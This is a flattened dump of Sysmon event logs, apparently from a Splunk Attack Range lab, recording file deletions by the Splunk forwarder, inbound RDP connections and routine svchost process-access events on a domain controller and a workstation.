Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AFD1E05B462268EDCD403680EF56F06,SHA256=8F9EF876618E91926763E8D689D0311D2D6C99C17E720A76451E5C6822D7911D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:00.676{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54C45916403B16D6F19C36C202C01A15,SHA256=329B4F9A9DB986B8B94099FBE54A2AFDE29D7802B80DDC955FC0EC0A01E8C7B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:00.629{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6DAB49E35CD16B9F305B2741F9F439EF,SHA256=10BC46F1768051556A17ADC410DD3276046C6C785B07112723CF0C9835C9F58E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:00.301{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04110AE760F30094EAE15AD90BE95D35,SHA256=0229FCAA7B0B57366E03A8F2F07F03D13E6692F38AE941B47E1DA3A240DD08C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:00.489{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42C1F2CFDC0D273461D4247F6F870C03,SHA256=70E6ADF586141747B3F99617AD3D9811BCFDFAB70233E67ACA774CE48594249F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:59.314{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63311-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=862A250F1324B1ED551709869637F528,SHA256=552CECF8DE8B75248CC66145D785998FB74B8B70F6A53456696A6DAE253DA9BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:58.672{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59589-false10.0.1.12-8000- 23542300x8000000000000000982136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:01.491{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A4842346A1B79E85B2CDBDC0441487,SHA256=8288A8DDE834078B99ED2D9D8F81BB86A04CC7926DF6EF5CD6FBFDB0E6B471D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD3-6151-4B00-00000000FD01}4056C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-3100-00000000FD01}2520C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.082{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:02.489{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6693F66CAAAE76CBBC68FC0103B036C1,SHA256=EF3047A5F839323CAB02C8B33B301BECB110247D840B1F03759B7399AEA180DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:02.491{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B6DE901D69929B08E52F74B5E1322CC,SHA256=EDFCF259DC91FDA2242DDBF261C1B6DC14EC815EF93924CBEAB4588CE95F718A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:01.042{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse119.167.194.165-57609-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000982139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:03.505{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932EDDE8D30E1E544FFC950AA0C65B80,SHA256=E547041285E1D3D41D3A0273501954CE21DBC8EC8964F6E2C596E9A2D764588B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:03.974{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AFD1E05B462268EDCD403680EF56F06,SHA256=8F9EF876618E91926763E8D689D0311D2D6C99C17E720A76451E5C6822D7911D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:03.536{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E04565F68EC6FCDE26F9CE56B85A4D13,SHA256=C4E4AA914B8BA0ECEE614CCC7FD51F7B9D7469FC75AF671821BCAF51534AB4FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:03.536{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A1867201819DC90AEA821395DE5A29BB,SHA256=CF5497AC3D479CBE6B7385D0B1E217250BBFC6E08B6BD0518462A281D6904D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:03.489{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C74BF928749277FF6227C52780A38D,SHA256=859ED06E7461A7D59B8A2D227921CEA3F8B79B7488755FE72726FCC8D9AFE9B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:04.521{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95054B50555EF5E6A4CFE1FB8CC2FD39,SHA256=EDDF8D7AD1EE34F9565C87F071A6609428D116B52F3AD51EA98FFDE167E6C9B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:04.583{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1B49B64DB1DF5D449A74E4826D60F23,SHA256=81E00C1A65773937DD76BD53531FA678195B0FB2AF507C7C96CB6C21A2BDCA21,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:02.631{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-52508-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:02.331{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65129- 354300x80000000000000001057804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:02.174{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000982141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:05.521{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41BF687B8513185447E057F3AAC8E3F8,SHA256=C81019B4BB4CE588BCDB96F1CAD2FDF1417B5B2FA9B5D3259EA9AA87DE9A54A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:05.583{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D10E200AF541C69DB99C1371A9283A,SHA256=CC23405123D2A62A95E3782CBB521365C7D89A26789903399F21034C0EA35892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.880{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF822CEB288C1CC472B8BFBF8B316F9B,SHA256=4BE10440332E4B6362C4ECCED2DEDCD159B429BFDDA677DF3960DC366CA1DB38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:06.536{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program 